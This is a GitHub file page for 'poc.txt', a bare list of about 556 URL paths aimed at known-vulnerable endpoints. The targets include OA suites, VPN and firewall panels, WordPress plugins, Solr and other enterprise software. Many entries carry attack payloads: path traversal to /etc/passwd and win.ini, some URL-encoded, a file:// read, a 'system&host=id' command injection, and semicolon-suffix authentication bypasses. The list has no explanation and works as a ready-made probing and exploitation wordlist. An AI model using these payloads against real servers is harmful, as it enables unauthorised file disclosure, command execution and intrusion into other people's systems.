-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathpoc.txt
556 lines (556 loc) · 18.6 KB
/
poc.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
/runtime/admin_log_confcache
/api/dbstat/gettablessize
/dataSetParam/verification;swagger-ui
/CFIDE/adminapi/_servermanager/servermanager.cfc
/api/dev/consumers
/webtools/control/getJSONuiLabelArray
/webtools/control/ProgramExport
/webtools/control/xmlrpc
/jobs
/s2_066_war_exploded/upload.action
/api/jolokia
/api/sys/user/list
/solr/admin/metrics
/prx/000/http/localhost/client_sec
/template/aui/text-inline.vm
/cgi-bin/Save.cgi
/%2577eb%2575i_%2577sma_Http
/file-manager/backend/makefile
/cobbler_api
/json/setup-restore.action
/coremail/common/assets
/WebInterface/function
/HNAP1
/cgi-bin/nas_sharing.cgi
/sysmanage/changelogo.php
/app/sys1.php
/tags.php
/api/v1/userlist
/api/v1/adduser
/admin/pr_monitor/getting_index_data.php
/admin/config_all.php
/tmui/login.jsp
/api/login
/remote/VULNCHECK
/servlet/ftpservlet
/users/password
/component_server
/imc/javax.faces.resource/dynamiccontent.properties.xhtml
/mselfservice/javax.faces.resource/dynamiccontent.properties.xhtml
/audit/gui_detail_view.php
/imc/primepush/%2e%2e/flexFileUpload
/webui
/center/api/files;.html
/svm/api/external/report
/cgi-bin/popen.cgi
/html/2word
/view/qJvqhFt.json
/ipg/static/appr/lib/flexpaper/php/view.php
/ipg/appr/MApplyList/downloadFile_client/getdatarecord
/api/v1/totp/user-backup-code
/systemController/showOrDownByurl.do
/common/down/file
/v1/app/writeFileSync
/a/sys/user/validateMobile
/a/sys/user/validateMobileExist
/a/sys/register/registerUser
/a/sys/user/resetPassword
/jeecg-boot/jmreport/queryFieldBySql
/jeecgboot/jmreport/testConnection
/api/../commonController.do
/pwned?jsp=/app/rest/users;.jsp
/api/index.php/v1/config/application
/api/v1/terminal/sessions
/admin/users/upavatar.html
/api/file/formimage
/linkwechat-api/common/download/resource
/goform/AccessControl
/api/v1/user/save
/admin/file/edit.do
/modules/thumb/thumb.php
/develop/systparam/softlogo/upload.jsp
/api/session/properties
/cms/content/list.do
/classes/common/busiFacade.php
/index.cfm/_api/json/v1/default
/developLog/downloadLog.php
/boardDataWW.php
/PW/SaveDraw
/Pic/Indexs
/api/v1/policies/validation/condition
/api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition
/api/v1/policies
/user-create.jsp
/ssl-vpn/hipreport.esp
/cgi-bin/Maintain/date_config
/content-apply/libres_syn_delete.php
/api/v1/file/loadfile
/Applications/Forms/SearchSetting/FileUpOrDown.ashx
/service.pdfs/confluence
/cgi-bin/filemanager/share.cgi
/view/vpn/autovpn/online_check.php
/system/dept/edit
/DepartmentPlan/department_plan_attach_download.aspx
/ui/login.php
/tool/log/c.php?strip_slashes=system&host=id
/connectioncheck.php
/js/player/dmplayer/dmku
/actpt_5g.data
/log/decodmail.php
/smartbi/vision/RMIServlet
/function/save
/en-US/account/login
/api/blade-log/error/list
/api/blade-user/export-user
/api/blade-system/dict-biz/list
/api/blade-user/user-list
/userentry
/cgi-bin/cstecgi.cgi
/JFYRUKOAPAQZRKOC/userRpm/WlanNetworkRpm.htm
/cgi-bin/luci
/cgi-bin/admin.cgi
/cgi-bin/DownloadCfg.jpg
/wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php
/RmWeb/noCookiesMail
/notice/confirm.php
/public/index.php/weixin/message/_send_by_group
/?p=3232&wp_automatic=download&link=file:///etc/passwd
/wp-content/plugins/wp-automatic/inc/csv.php
/wp-content/plugins/js-support-ticket
/wp-content/plugins/wp-hotel-booking
/wp-content/plugins/LayerSlider/readme.txt
/wp-admin/admin-ajax.php
/wp-json/bricks/v1/render_element
/wp-json/notificationx/v1/analytics
/wp-content/plugins/backup-backup
/soap/GetUser
/run
/front/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
/api/v1/users/default/activate
/static/../../../../../../etc/passwd
/avcon.action
/assetsmanager/upload
/opmode.asp
/doc/upload
/../../../../../../../../../../../../../../etc/passwd
/flash/addcrypted2
/php/manga/delete.php
/wp-admin/admin-ajax.php
/loginService.fe?op=D
/defaultroot/iWebOfficeSign/OfficeServer.jsp
/defaultroot/convertFile/text2Html.controller
/defaultroot/services/./././RhinoScriptEngineService
/defaultroot/platform/portal/layout/common/upload.jsp
/defaultroot/modules/subsidiary/contract/contract_gd.jsp
/defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp
/defaultroot/wpsservlet
/defaultroot/evoInterfaceServlet
/defaultroot/wpsservlet
/WeChatConfig/ashx/DownLoadFiles.ashx
/workflow/DemoDefinitionProxyServlet
/common/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector
/heimdall/pages/cla/selectApp.jsp
/SystemManager/Comm/CommFunHandler.ashx
/cgi-bin/ExportSettings.sh
/admin.php
/3.0/authService/config
/servlet/fileupload/gpy
/sys/user/validateLoginName
/oa/setup/updateUiSetup
/CDGServer3/ClientAjax
/CDGServer3/DecryptApplicationService2
/CDGServer3/workflowE/useractivate/update.jsp
/file/uploadFile
/CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../user/dataSearch.jsp
/CDGServer3/MailMessageLogServices
/CDGServer3/document/UploadFileManagerService
/CDGServer3/dwr/call/plaincall/JLockSeniorDao.findByLockName.dwr
/CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=C:///Windows/win.ini&uploadFileId=1&fileName1=test1111
/CDGServer3/GetValidateLoginUserService
/CDGServer3/js/../NavigationAjax
/CDGServer3/document/RestoreFiles
/CDGServer3/document/UploadFileList
/CDGServer3/downloadfromfile
/CDGServer3/hiddenWatermark/uploadFile
/solr/flow/debug/dump
/CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../user/dataSearch.jsp
/solr/flow/dataimport
/CDGServer3/fileType/importFileType.do
/SMS/SmsDataList
/mainFunctions/comboxstore.action
/attachment?file=/etc/passwd
/AjaxService/Upload.aspx
/OA/common/mod/ajax.ashx
/include/file.php
/resources/files/ue/catchByUrl
/ProjectManager.json
/config/externalConfig.json
/ajaxinvoke/frameworkModuleJob.processApkUpload.upload
/m/login.php
/umweb/shadow
/jshERP-boot/user/getAllList;.ico
/stylei/MainPage.jsp
/user/create
/Public/ckeditor/plugins/multiimage/dialogs/image_upload.php
/QH.aspx
/Sys/DictionaryEdit.aspx
/sslvpn/sslvpn_client.php
/portal/services/itcBulletin
/admin/login_login.action
/portal/attachment_clearTempFile.action
/config/asst/system_setPassWordValidate.action/capture_handle.action
/evo-runs/v1.0/auths/sysusers/random
/portal/services/clientServer
/portal/services/carQuery/getNewStaypointDetailQuery
/portal/attachment_downloadByUrlAtt.action
/CardSolution/card/accessControl/swingCardRecord/deleteFtp
/portal/services/carQuery/getFaceCapture/searchJson
/publishing/publishing/material/file/video
/emap/webservice/gis/soap/bitmap
/ipms/barpay/pay
/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson
/evo-apigw/evo-cirs/file/readPic
/evo-apigw/evo-oauth/oauth/token
/runtime/state.bin
/AgentBoard.XGI
/cgi/maincgi.cgi
/view/IPV6/naborTable/static_convert.php
/ops/index.php
/HM/M_Main/WorkGeneral/docfileDownLoad.aspx
/api/client/getsimilarlist
/changepass.php
/rptsvr/upload
/directdata/direct/router
/callback/%2E%2E;/code/upload
/Tools/Video/VideoCover.aspx
/register/toDownload.do
/webui/?g=aaa_portal_auth_local_submit
/webui/?g=aaa_portal_auth_config_reset
/language.php
/lan/admin_getLisence
/templates/attestation/../../servlet/DisplayFiles
/templates/attestation/../../servlet/codesettree
/templates/attestation/../../selfservice/lawbase/downlawbase
/templates/attestation/../../servlet/fieldsettree
/templates/attestation/../../general/info/view
/w_selfservice/oauthservlet/%2e./.%2e/system/options/customreport/OfficeServer.jsp
/templates/attestation/../../servlet/DisplayExcelCustomReport
/templates/attestation/../../report/report_collect/report_org_collect_tree.jsp
/workbench/duty/showmediainfo
/get_site_status
/JoinfApp/EMail/UploadEmailAttr
/sysplat/dataget/data.ashx
/master/ajaxActions/setSystemTimeAction.php
/WebReport/ReportServer
/index.php/jiliyu
/interlib/websearch/WebBookNew
/interlib3/service/sysop/updOpuserPw
/interlib/common/SSOServlet
/Org/service/Service.asmx/GetUserByEmployeeCode
/WebService/Lk6SyncService/DirectToOthers/GetSSOStamp.asmx
/Services/FileService/UserFiles/GetAuthorizeKey.ashx
/Webservice/IM/Config/ConfigService.asmx/GetIMDictionary
/gtp/im/services/group/msgbroadcastuploadfile.aspx
/Manage/Admin/OrganSetup.aspx
/User/AccountEdit.aspx
/bhost/test_qrcode_b
/download/..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd
/EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx
/service_transport/service.action
/OfficeManagement/RegisterManager/Upload.aspx
/newsedit/newsplan/task/binary.do
/formservice?service=workflow.sqlResult
/EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx
/caztbweb/VisitorWeb/VisitorWeb_XMLHTTP.aspx
/myunke/ApiUpdateTool/ApiUpdate.ashx
/api/system/ExecuteSqlForSingle
/WebService/BasicService.asmx
/api/files/DownloadFile
/Sys_ReportFile/ImportReport
/workspace/frame/permission/common/eos.jmx
/default/jmx.jmx
/resource/utils/GenerateEntityFromTable.aspx
/rep/login
/api/user/login
/sys/ui/extend/varkind/custom.jsp
/servlet/PayBill
/C6/Control/GetSqlData.aspx
/dwr/call/plaincall/DocDwrUtil.ifNewsCheckOutByCurrentUser.dwr
/E-mobile/App/Ajax/ajax.php?action=mobile_upload_save
/inc/jquery/uploadify/uploadify.php
/service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc
/webconf/Exec/index
/webconf/GetFile/indexpath=../../../../../../../../../../../../../../etc/passwd
/api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin
/webconf/GetFile/indexpath=../../../../../../../../../../../../../../etc/passwd
/?g=obj_app_upfile
/changepass.php?type=2
/gtp/im/services/group/msgbroadcastuploadfile.aspx
/WebReport/ReportServer?op=resource&resource=/etc/passwd&i18n=true
/tomcat.jsp?dataName=role_id&dataValue=1
/pweb/careerapply/HrmCareerApplyPerView.jsp
/weaver/org.springframework.web.servlet.ResourceServlet
/weaver/weaver.file.SignatureDownLoad
/client.do
/messageType.do
/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini
/general/index/UploadFile.php
/eoffice10/server/public/api/attachment/atuh-file
/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/prop/weaver.properties
/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../
/rest/ofs/ProcessOverRequestByXml
/mobile/%20/plugin/browser.jsp
/api/ec/dev/locale/getLabelByModule
/building/backmgr/urlpage/mobileurl/config_2.php
/UserSelect
/api/portalTsLogin/utils/getE9DevelopAllNameValue2
/taste/addTaste
/emp/lang2sql
/entsoft/RegulatePriceAction.entsoft;.js
/entsoft/PurchaseAction.entphone;.png
/entsoft/T0140_editAction.entweb;.js
/entsoft/CrmBasicAction.entcrm
/entsoft_en/Storage/machord_doc.jsp;.js
/entsoft/MailAction.entphone;.js
/entsoft_en/entereditor/jsp/fileupload.jsp
/entsoft/CustomerAction.entphone;.js
/Interface/LogReport/LogReport.php
/lm/api/files;.css?link=/etc/passwd
/php/ping.php
/php/exportrecord.php
/bic/ssoService/v1/applyCT
/eps/api/resourceOperations/upload
/webui/?file_name=../../../../../etc/passwd&g=sys_dia_data_down
/portal/conf/config.properties
/center/api/installation/detection
/center/api/session
/getylist_login.do
/InputServlet
/demo/servlet/dataSphereServlet
/InputServlet
/php/catjs.php
/LogInOut.php
/svpn_html/loadfile.php?file=/etc/./passwd
/src/sangforindex
/Scripts/admintool
/Applications/Attachment/upload.ashx
/Account/ChangePwd
/property/propertyRightAlteration/printManyPdf
/common/download?fileName=../../wxzj/application-druid.yml
/Admin/appsave
/Admin/appdel
/RAPAgent.XGI
/u8qx/license_check.jsp
/u8qx/bx_historyDataCheck.jsp
/uapjs/jsinvoke
/uapws/service/nc.uap.oba.update.IUpdateService
/pub/help2.php
/ajax/uploadfile.php
/background/reservationcomplete.php
/servlet/FileUpload
/servlet/PayReturnForWcp
/Proxy
/u8qx/SelectDMJE.jsp
/UploadFileData
/u8qx/bx_dj_check.jsp
/u8qx/dialog_moreUser_check.jsp
/listSelectDialogServlet
/u8qx/obr_zdybxd_check.jsp
/services/operOriztion
/u8qx/slbmbygr.jsp
/u8qx/sqcxIndex.jsp
/ufgovbank
/services/userInfoWeb
/ufgovbank
/logs/debug.log
/ma/emp/maEmp/download?fileName=../../../etc/passwd
/portal/docctr/open/word.docx?disp=/WEB-INF/web.xml
/service/~iufo/com.ufida.web.action.ActionServlet
/ncchr/pm/fb/attachment/uploadChunk
/nccloud/mob/pfxx/manualload/importhttpscer
/uapim/upload/avatar
/portal/pt/erfile/down/bill
/portal/pt/servlet/runStateServlet/doPost
/uapws/saveDoc.ajax
/ebvp/infopub/showcontent
/mp/login/../uploadControl/uploadFile
/portal/pt/servlet/workflowImageServlet/doPost
/ncchr/attendScript/internal/runScript
/hrss/dorado/smartweb2.RPC.d
/uapws/soapFormat.ajax
/uapim/upload/grouptemplet
/portal/pt/servlet/saveImageServlet/doPost
/servlet/~ic/nc.bs.framework.server.ConfigResourceServlet
/portal/pt/PaWfm/open
/portal/pt/servlet/saveXmlToFileServlet/doPost
/portal/pt/xml/file/download
/portal/pt/printpdf/printBill
/portal/registerServlet
/u8cuapws/rest/archive/verify
/service/~iufo/nc.itf.iufo.mobilereport.data.KeyWordReportQuery
/pub/downloadfile.php
/ajax/getemaildata.php
/linux/pages/upload.jsp
/service/~iufo/com.ufsoft.iuforeport.tableinput.TableInputOperServlet
/servlet/~uap/nc.impl.pub.filesystem.FileManageServlet
/service/~hrpub/nc.bs.hr.tools.trans.FileServlet
/ServiceDispatcherServlet
/service/XChangeServlet
/yyoa/portal/tools/doUpload.jsp
/servlet/RegisterServlet
/servlet/~uap/nc.bs.sm.login2.RegisterServlet
/VerifyToken
/u8cloud/api/file/upload/base64
/servlet/~iufo/nc.itf.iufo.mobilereport.data.KeyWordDetailReportQuery
/service/~iufo/com.ufida.web.action.ActionServlet
/service/~iufo/com.ufida.web.action.ActionServlet
/CS/Office/AutoUpdates/PatchFile.asmx
/u9/OnLine/UMWebService.asmx
/ajax/swfupload.php
/uapjs/jsinvoke
/bg/attach/FileDownload?execlPath=C://Windows//win.ini
/servlet/imagefield
/linksframe/linkadd.jsp
/tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx
/webservice/create_site.php
/tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx
/tplus/SM/DTS/DownloadProxy.aspx
/tplus/UFAQD/InitServerInfo.aspx
/tplus/UFAQD/keyEdit.aspx
/maportal/appmanager/uploadIcon.do
/portal/file?cmd=getFileLocal&fileid=..%2F..%2F..%2F..%2Fwebapps/nc_web/WEB-INF/web.xml
/maportal/appmanager/uploadApk.dopk_obj=
/CS/Office/AutoUpdates/PatchFile.asmx
/manager/ipping.php
/tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore
/tplus/UFAQD/KeyInfoList.aspx
/cgi-bin/adm.cgi
/user-login.html
/zentaopms/www/index.php
/biz/api.php
/api/client/get_extension_yl.php
/app/ext/ajax_users.php
/api/client/event/uploadfile.php
/api/client/invite2videoconf.php
/KT_Admin/CarCard/DoubtCarNoListFrom.aspx
/Webservice.asmx
/ReportServlet
/ReadFile?tempFile=path&path=../../website/WEB-INF/&fileName=web.xml
/ioffice/prg/set/report/iorepsavexml.aspx
/ioffice/prg/interface/zyy_AttFile.asmx
/ioffice/prg/interface/udfGetDocStep.asmx
/RedseaPlatform/PtFjk.mob
/api/v1/device/bugsInfo
/api/v1/login
/acenter/meetingShow!downloadDocument.action
/admin/singlelogin.php
/protocol/index.php
/admin/add_ikev2.php
/admin/add_postlogin.php
/admin/config_Anticrack.php
/admin/config_ISCGroupNoCache.php
/admin/list_ipAddressPolicy.php
/bottomframe.cgi
/?g=sys_hand_upfile
/?g=app_av_import_save
/index.php/api/Software/getInfo
/write
/UniExServices/poserver.zz
/UniExServices/poserver.zz
/Hosp_Portal/uploadLogo.aspx
/FileManage/UpLoadFile.aspx
/SystemMng.ashx
/SystemMng.ashx
/UpLoadPic.ashx
/downloads.aspx
/esn_mobile_pns/service/userTokenService
/mobile_portal/logs/autoLogin.log
/mobile_portal/api/pns/message/send/batch/6_1sp1
/seeyon/wpsAssistServlet
/seeyon/rest/orgMember/-7273032013234748168/password/share.do
/seeyon/rest/m3/common/system/properties
/seeyou/ajax.do
/seeyon/m-signature/RunSignature/run/getAjaxDataServlet
/seeyon/thirdpartyController.do
/seeyon/rest/phoneLogin/phoneCode/resetPassword
/seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload
/sysform/003/editflow_manager.js%70
/seeyon/personalBind.do?method=retrievePassword
/webservices/WebJobUpload.asmx
/SM/rpt_listreport_definefield.aspx
/eis/service/api.aspx
/dossier/doc_fileedit_word.aspx
/frm/frm_form_list_main.aspx
/frm/frm_button_func.aspx
/third/DingTalk/Demo/ShowUserInfo.aspx
/third/DingTalk/Pages/UniformEntry.aspx
/flow/fl_define_flow_chart_show.aspx
/api///sys/ui/sys_ui_extend/sysUiExtend.do?method=upload
/data/sys-common/treexml.tmpl
/third/wechat/wechatLoginHelper.do
/sys/ui/sys_ui_component/sysUiComponent.do?method=getThemeInfo&s_ajax=true
/ajax/loaduser.php
/debug.php
/download.php
/xds/deleteStudy.php
/XopServerRS/rest/futurehotel/operate
/XopServerRS/rest/futurehotel/query
/fox-invoker/FoxLookupInvoker/?return-exception=true
/succezbi/sz/commons/form/file/uploadChunkFile
/User/ManagerList.aspx
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/inspect_file/upload
/run_stop/delete.do;downloadLogger.action
/808gps/logger/downloadLogger.action
/808gps/StandardLoginAction_getAllUser.action
/xz_center/list
/inc/package/down.php
/general/reportshop/utils/get_datas.php
/module/retrieve_pwd/header.inc.php
/general/system/seal_manage/iweboffice/delete_seal.php
/general/system/seal_manage/dianju/delete_log.php
/general/management_center/portal/oa_engine/engine_manage_bulletin_number/query.php
/report/DesignReportSave.jsp
/jc6/servlet/clobfield
/C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx
/c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx
/c6/JHSoft.Web.Vehicle/CarCardInfo.aspx/
/c6/jhsoft.mobileapp/AndroidSevices/HomeService.asmx
/C6/JHSoft.Web.Mail/MailTemplates.aspx
/C6/JHsoft./C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1CostEAI/SAP_B1Config.aspx/?manage=1
/jc6/servlet/Upload
/jc6/ntkoUpload/ntko-upload!upload.action
/jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action
/c6/KindEditor1/asp/upload_json.asp
/C6/Control/UploadFileEditorSave.aspx
/C6/JHSoft.WCF/FunctionNew/FileUploadMessage.aspx
/inter/ajax.php
/softmanagement/distribute/save_tools.php
/inter/update_software_info_v2.php
/inter/software_relation.php
/pages/admin/tools/uploadFile/doUpload.jsp
/query/shigongjihuajindu/TianBaoJiLu.aspx
/appmonitor/protect/jndi/loadTree
/admin//protect/application/deployApp
/easportal/buffalo/%2e%2e/cm/myUploadFile.do
/plt_document/fragments/content/pdfViewLocal.jsp?path=C:/Windows/win.ini
/plt_portal/setting/uploadLogo.action
/k3cloud/SRM/ScpSupRegHandler
/Kingdee.BOS.ServiceFacade.ServicesStub.ServiceGateway.GetServiceUri.common.kdsvc
/CommonFileServer/c:/windows/win.ini
/K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc
/cms/content/list
/mcms/search.do
/ddi/server/fileupload.php
/cli.php
/selfservice/service/operatorReportorRoamService
/flow_control_pi/flwo.control.php
/web_action.do
/servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print
/ProxyServletUtil?url=file:///c:/Windows/win.ini
/oaerp/ui/common/publicData.js
/servlet/uploadAttachmentServlet
/2.ln?SYS_LINK=77507068764957484a5067777862714f457a66574871642f4330574c76717868394a35496d37416c497951724f33446f51486375685a5a2b31684938472b7056
/common/common_sort_tree.jsp;.js
/send_order.cgi?parameter=operation
/magicflu/html/mail/mailupdate.jsp